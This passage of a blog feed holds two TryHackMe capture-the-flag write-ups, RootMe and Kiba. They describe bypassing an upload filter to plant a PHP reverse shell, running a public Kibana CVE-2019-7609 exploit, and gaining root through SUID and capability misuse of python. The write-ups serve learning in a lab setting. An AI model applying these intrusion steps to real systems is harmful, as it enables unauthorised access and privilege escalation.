		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=438</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe RootMe is arranged to help newcomers hack this box. Enumerate, bypass restrictions, and abuse SUID perms to escalate to root.</p>
<p>The post <a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading" id="introduction">Introduction</h2>



<p class="wp-block-paragraph"><a href="https://tryhackme.com/room/rrootme">RootMe</a> is a beginner-level capture-the-flag challenge from TryHackMe. The tasks are arranged to help newcomers through the processes of hacking this machine. It starts with enumerating the system by scanning for open ports and directories. Next, we will bypass the website&#8217;s upload restrictions and gain a reverse shell on the webserver. Finally, we will abuse SUID permissions to escalate user privileges to root.</p>



<h2 class="wp-block-heading" id="information-gathering">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="521" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/1.-Task-2-1024x521.png?resize=1024%2C521" alt="Task 2" class="wp-image-757" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?resize=1024%2C521&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?resize=300%2C153&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?resize=768%2C391&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 2</figcaption></figure>



<p class="wp-block-paragraph">There is not a lot of information to be gathered during the information-gathering phase. Almost all of the reconnaissance task questions can be answered through Nmap.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="757" height="388" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/2.-nmap-h.png?resize=757%2C388" alt="RootMe Nmap results" class="wp-image-790" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/2.-nmap-h.png?w=757&amp;ssl=1 757w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/2.-nmap-h.png?resize=300%2C154&amp;ssl=1 300w" sizes="(max-width: 757px) 100vw, 757px" /><figcaption>Nmap</figcaption></figure>



<p class="wp-block-paragraph">There are <code>2</code> open ports on this machine. This Ubuntu server is using Apache version <code>2.4.29</code> and is running <code>SSH</code> on port 22.</p>



<p class="wp-block-paragraph">The last thing to find is if there are any hidden directories on the Apache webserver.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="779" height="400" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/3.-gobuster-h.png?resize=779%2C400" alt="GoBuster results" class="wp-image-791" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/3.-gobuster-h.png?w=779&amp;ssl=1 779w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/3.-gobuster-h.png?resize=300%2C154&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/3.-gobuster-h.png?resize=768%2C394&amp;ssl=1 768w" sizes="(max-width: 779px) 100vw, 779px" /><figcaption>directories</figcaption></figure>



<p class="wp-block-paragraph">Gobuster found a couple of directories, but the ones of importance are <code>/panel</code> and <code>/uploads</code>.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="520" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/5.-Task-2-Solutions-1024x520.png?resize=1024%2C520" alt="RootMe Task 2 Solutions" class="wp-image-762" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?resize=1024%2C520&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?resize=300%2C152&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?resize=768%2C390&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?w=1210&amp;ssl=1 1210w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 2 Solutions</figcaption></figure>



<h2 class="wp-block-heading" id="exploitation">Exploitation</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="208" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/6.-Task-3-1024x208.png?resize=1024%2C208" alt="Task 3" class="wp-image-763" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?resize=1024%2C208&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?resize=300%2C61&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?resize=768%2C156&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?w=1210&amp;ssl=1 1210w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 3</figcaption></figure>



<p class="wp-block-paragraph">Let&#8217;s check out the <code>/panel/</code> directory. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="669" height="707" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/4.-panel.png?resize=669%2C707" alt="panel directory" class="wp-image-761" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/4.-panel.png?w=669&amp;ssl=1 669w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/4.-panel.png?resize=284%2C300&amp;ssl=1 284w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption>/panel</figcaption></figure>



<p class="wp-block-paragraph">It looks like we can upload any file we want to it. Let&#8217;s try uploading a <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">PHP reverse shell</a>. <a href="https://www.netsparker.com/blog/web-security/understanding-reverse-shells/">&#8220;A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the attacker’s host.&#8221;</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="669" height="696" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/7.-php-denied.png?resize=669%2C696" alt="failed php upload" class="wp-image-764" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/7.-php-denied.png?w=669&amp;ssl=1 669w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/7.-php-denied.png?resize=288%2C300&amp;ssl=1 288w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption>PHP failed upload</figcaption></figure>



<p class="wp-block-paragraph">It looks like the webserver does not allow PHP files to be uploaded to it. <a href="https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass">&#8220;Developers may blacklist specific file extensions and prevent users from uploading files with extensions that are considered dangerous.&#8221;</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="302" height="111" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/8.-php2php5.png?resize=302%2C111" alt="php to php5 file" class="wp-image-765" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/8.-php2php5.png?w=302&amp;ssl=1 302w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/8.-php2php5.png?resize=300%2C110&amp;ssl=1 300w" sizes="(max-width: 302px) 100vw, 302px" /><figcaption>changing the file to php5</figcaption></figure>



<p class="wp-block-paragraph">We can try to bypass the file upload blacklist by changing the extension of the file. For example, I have changed the file from <code>reverse.php</code> to <code>reverse.php.php5.</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="670" height="694" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/9.-php5-accepted.png?resize=670%2C694" alt="successful php5 file upload" class="wp-image-766" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/9.-php5-accepted.png?w=670&amp;ssl=1 670w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/9.-php5-accepted.png?resize=290%2C300&amp;ssl=1 290w" sizes="(max-width: 670px) 100vw, 670px" /><figcaption>php5 successful upload</figcaption></figure>



<p class="wp-block-paragraph">The file has been successfully uploaded! We can even check out the <code>/uploads/</code> directory to confirm that the file has been uploaded.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="495" height="222" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/10.-uploads.png?resize=495%2C222" alt="uploads directory" class="wp-image-767" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/10.-uploads.png?w=495&amp;ssl=1 495w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/10.-uploads.png?resize=300%2C135&amp;ssl=1 300w" sizes="(max-width: 495px) 100vw, 495px" /><figcaption>/uploads directory</figcaption></figure>



<p class="wp-block-paragraph">We can use the <code>netcat</code> tool to listen for incoming IP connections to port 4444. After opening the <code>/uploads/reverse.php.php5</code> file on the web browser it makes the connection.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="774" height="277" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/13.-user-h.png?resize=774%2C277" alt="RootMe user.txt" class="wp-image-795" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/13.-user-h.png?w=774&amp;ssl=1 774w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/13.-user-h.png?resize=300%2C107&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/13.-user-h.png?resize=768%2C275&amp;ssl=1 768w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption>user.txt</figcaption></figure>



<p class="wp-block-paragraph">We can use the <code>find</code> command to search for files on the system. Since we know the file we are searching for is named user.txt we can use the <code>-name</code> flag to search for it. The <code>2&gt; /dev/null</code> at the end of the command make sure that nothing else is outputted to the command line.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="209" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/14.-Task-3-Solutions-1024x209.png?resize=1024%2C209" alt="RootMe Task 3 solutions" class="wp-image-771" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?resize=1024%2C209&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?resize=300%2C61&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?resize=768%2C157&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 3 Solutions</figcaption></figure>



<h2 class="wp-block-heading" id="post-exploitation">Post Exploitation</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="357" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/15.-Task-4-1024x357.png?resize=1024%2C357" alt="Task 4" class="wp-image-772" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?resize=1024%2C357&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?resize=300%2C104&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?resize=768%2C267&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 4</figcaption></figure>



<p class="wp-block-paragraph">Before this challenge, I had no idea what SUID permissions were. <a href="https://www.geeksforgeeks.org/finding-files-with-suid-and-sgid-permissions-in-linux/">&#8220;It is special file permission for executable files. This enables other users to run the file with the effective permissions of the file owner.&#8221;</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="500" height="106" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/16.-question-hint.png?resize=500%2C106" alt="" class="wp-image-773" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/16.-question-hint.png?w=500&amp;ssl=1 500w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/16.-question-hint.png?resize=300%2C64&amp;ssl=1 300w" sizes="(max-width: 500px) 100vw, 500px" /><figcaption>SUID permission question hint</figcaption></figure>



<p class="wp-block-paragraph">The question hint gives the command <code>find / -user root -perm /4000</code>.  This command finds files and directories, starting at directory /,  displays files owned by root, and with permissions set to 4000. With permissions set to 4000, a user can set the setuid bit and if the file is owned by root, they can escalate their privileges to root.  <a href="https://www.liquidweb.com/kb/how-do-i-set-up-setuid-setgid-and-sticky-bits-on-linux/">If a user executes that program it will do so as if they are the user root instead of themselves.</a></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="455" height="595" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/02/17.-suid-h.png" alt="" class="wp-image-816" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/02/17.-suid-h.png?w=455&amp;ssl=1 455w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/02/17.-suid-h.png?resize=229%2C300&amp;ssl=1 229w" sizes="(max-width: 455px) 100vw, 455px" /></figure>



<p class="wp-block-paragraph">One that sticks out to us is the <code>/usr/bin/python</code> file. We might be able to execute python code that will set the SUID bit and escalate our privileges to root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="814" height="312" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/18.-gtfobin.png?resize=814%2C312" alt="GTFObin" class="wp-image-775" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/18.-gtfobin.png?w=814&amp;ssl=1 814w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/18.-gtfobin.png?resize=300%2C115&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/18.-gtfobin.png?resize=768%2C294&amp;ssl=1 768w" sizes="(max-width: 814px) 100vw, 814px" /><figcaption>GTFObin</figcaption></figure>



<p class="wp-block-paragraph">This <a href="https://gtfobins.github.io/gtfobins/python/#suid">python code</a> should spawn an interactive bash shell as root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="471" height="115" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/19.-root-h.png?resize=471%2C115" alt="RootMe root.txt" class="wp-image-797" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/19.-root-h.png?w=471&amp;ssl=1 471w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/19.-root-h.png?resize=300%2C73&amp;ssl=1 300w" sizes="(max-width: 471px) 100vw, 471px" /><figcaption>root.txt</figcaption></figure>



<p class="wp-block-paragraph">Just like that, after changing our directory to the /usr/bin and executing the python code we are root. The root.txt file is found in the root directory.</p>



<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, RootMe was a fun challenge with a lot to learn from. We enumerated the services running on the machine, bypassed file upload restrictions, and escalated our privileges through setting SUID permissions. File permissions can cause unauthorized users to have access to resources that they were not intended to have. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="358" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/20.-Task-4-Solutions-1024x358.png?resize=1024%2C358" alt="RootMe Task 4 Solutions" class="wp-image-777" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?resize=1024%2C358&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?resize=300%2C105&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?resize=768%2C269&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 4 Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-rootme/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">438</post-id>	</item>
		<item>
		<title>TryHackMe: Kiba</title>
		<link>https://eric.cc/tryhackme-kiba/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-kiba</link>
					<comments>https://eric.cc/tryhackme-kiba/#comments</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Dec 2021 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=335</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe Kiba is a beginner-level challenges that focuses on enumeration and exploitation of the open source software Kibana.</p>
<p>The post <a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph"><a href="https://tryhackme.com/room/kiba">Kiba</a> is a beginner-level challenge from TryHackMe. The point of this challenge is to &#8220;Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.&#8221; By identifying the vulnerable service, and their public CVE&#8217;s, we can find an exploit that will give us a foothold onto the server and abuse Linux capabilities to escalate privileges to root.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="662" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/06/Task-1-1024x662.png?resize=1024%2C662" alt="Kiba tasks" class="wp-image-485" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?resize=1024%2C662&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?resize=300%2C194&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?resize=768%2C496&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?w=1210&amp;ssl=1 1210w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 1</figcaption></figure>



<p class="wp-block-paragraph">The first question of this challenge: <strong>What is the vulnerability that is specific to programming languages with prototype-based inheritance?</strong> I did not know the answer, but I did know where to find it.  After a quick Google search, we got the answer. It is <code>Prototype pollution</code>.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="691" height="152" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/prototype-pollution.png?resize=691%2C152" alt="" class="wp-image-537" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/prototype-pollution.png?w=691&amp;ssl=1 691w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/prototype-pollution.png?resize=300%2C66&amp;ssl=1 300w" sizes="(max-width: 691px) 100vw, 691px" /><figcaption>Prototype pollution</figcaption></figure>



<p class="wp-block-paragraph">To start this challenge, we will use Nmap to scan the server for its open ports. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="560" height="1024" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/nmap-h-560x1024.png?resize=560%2C1024" alt="Kiba Nmap results" class="wp-image-722" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?resize=560%2C1024&amp;ssl=1 560w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?resize=164%2C300&amp;ssl=1 164w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?resize=768%2C1404&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?w=773&amp;ssl=1 773w" sizes="(max-width: 560px) 100vw, 560px" /><figcaption>Nmap</figcaption></figure>



<p class="wp-block-paragraph">On Port 5601, we can see that an application named Kibana is running on the server. Kibana provides &#8220;<a href="https://www.elastic.co/what-is/kibana">search and data visualization capabilities for data indexed in Elasticsearch… It also acts as the user interface for monitoring, managing, and securing an Elastic Stack cluster</a>&#8220;. </p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/app-1024x493.png?resize=840%2C404" alt="Kibana dashboard" class="wp-image-538" width="840" height="404" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=1024%2C493&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=300%2C145&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=768%2C370&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=1536%2C740&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?w=1918&amp;ssl=1 1918w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption>Kibana Dashboard</figcaption></figure>



<p class="wp-block-paragraph">The answer to the second question can be found hidden within the website&#8217;s source code.  The version of Kibana they are running is version number 6.5.4.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="237" height="30" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/version.png?resize=237%2C30" alt="" class="wp-image-539"/><figcaption>Kibana version</figcaption></figure>



<p class="wp-block-paragraph">Now that we know the server is running Kibana version 6.5.4 it&#8217;s time to do some research and find if there are any public CVEs related to it.  </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="869" height="218" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/CVE-number.png?resize=869%2C218" alt="" class="wp-image-540" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/CVE-number.png?w=869&amp;ssl=1 869w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/CVE-number.png?resize=300%2C75&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/CVE-number.png?resize=768%2C193&amp;ssl=1 768w" sizes="(max-width: 869px) 100vw, 869px" /></figure>



<p class="wp-block-paragraph">Published on several large cybersecurity blogs,  CVE-2019-7609 is a vulnerability that allows for remote code to be executed on servers running Kibana version 6.5.4. Luckily, one of the <a href="https://www.tenable.com/blog/cve-2019-7609-exploit-script-available-for-kibana-remote-code-execution-vulnerability">articles</a> that posted about it links to a GitHub repository containing an exploit script.</p>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">All I had to do was download the <a href="https://github.com/LandGrey/CVE-2019-7609/">GitHub repository</a>, set up a netcat listener on port 4444, and run the script.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="775" height="414" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/07/exploit.png?resize=775%2C414" alt="CVE-2019-7609" class="wp-image-511" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/exploit.png?w=775&amp;ssl=1 775w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/exploit.png?resize=300%2C160&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/exploit.png?resize=768%2C410&amp;ssl=1 768w" sizes="(max-width: 775px) 100vw, 775px" /><figcaption>Kiba Exploit</figcaption></figure>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Finding the user.txt flag was trivial, all I had to do was change my directory to /home/Kiba and use the command <code>cat user.txt</code>.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="625" height="646" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/user-h.png?resize=625%2C646" alt="Kiba user.txt flag" class="wp-image-723" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/user-h.png?w=625&amp;ssl=1 625w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/user-h.png?resize=290%2C300&amp;ssl=1 290w" sizes="(max-width: 625px) 100vw, 625px" /><figcaption>user.txt</figcaption></figure>



<p class="wp-block-paragraph">Questions 5 and 6 give us a direction we can take to gain root privileges. Question 5 does not need to be answered, but it should be noted. Question 6: <strong>How would you recursively list all of these capabilities?</strong> The <code>getcap -r /</code> command will recursively <a href="https://man7.org/linux/man-pages/man8/getcap.8.html">examine file capabilities</a> within the directory. </p>



<p class="wp-block-paragraph">When running this command in the Kiba home directory, we can see that <code>python3 = cap_setuid+ep</code>. This means that I manipulate my user identifier to <a href="https://medium.com/@gggauravgandhi/uid-user-identifier-and-gid-group-identifier-in-linux-121ea68bf510">any number used to identify the user to the system and to determine which system resources</a> I have access to. </p>



<p class="wp-block-paragraph">This <a href="https://gtfobins.github.io/gtfobins/python/#capabilities">snippet</a> from GTFObins allows me to use python to escalate my privileges to root by setting my uid to 0.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="786" height="226" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/root-h.png?resize=786%2C226" alt="privilege escalation" class="wp-image-724" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-h.png?w=786&amp;ssl=1 786w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-h.png?resize=300%2C86&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-h.png?resize=768%2C221&amp;ssl=1 768w" sizes="(max-width: 786px) 100vw, 786px" /></figure>



<p class="wp-block-paragraph">Now that we have rooted the box, we can change to the root directory and read the root.txt flag.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="432" height="195" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/root-txt-h.png?resize=432%2C195" alt="Kiba root.txt flag" class="wp-image-725" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-txt-h.png?w=432&amp;ssl=1 432w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-txt-h.png?resize=300%2C135&amp;ssl=1 300w" sizes="(max-width: 432px) 100vw, 432px" /><figcaption>root.txt</figcaption></figure>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this was a really fun and straightforward challenge to complete. The questions were able to guide me in the right direction without giving too much away. Through this, I learned about Linux capabilities and how to exploit its privileges.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="681" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/07/Task-1-Solutions-1024x681.png?resize=1024%2C681" alt="Kiba Solutions" class="wp-image-515" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?resize=300%2C199&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?w=1211&amp;ssl=1 1211w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 1 Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-kiba/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
